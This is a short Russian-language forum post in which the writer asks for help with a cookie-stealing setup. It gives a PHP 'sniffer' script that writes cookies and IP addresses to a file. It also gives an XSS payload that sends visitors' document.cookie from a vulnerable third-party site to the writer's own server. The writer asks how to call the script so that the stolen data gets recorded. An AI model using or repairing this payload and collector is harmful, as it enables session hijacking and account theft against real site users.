Начёт сниффера.Код взял с форума:

<?php


$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

$s = fopen("C:\Program Files\VertrigoServ\www\cookies.txt","w");

if($s) {

echo "Successfully opened!";
fputs($s,$cookie);
echo "\n";
fputs($s,$ip);

}

else {

echo "У нас праблемы...";

}


?>

Также есть XSS на одном сайте.Как нужно обратиться к скрипту,чтобы он записал данные ?

"<script%0A%0D>s=new Image();s.src="http://my_ip/sniffer.php?"+document.cookie%3B</script>

Где my_ip - мой Ip адрес).На серве лежит скрипт sniffer.php. В фаил ничего не записалось,вот я и подумал,что обращаюсь к скрипту неправильно.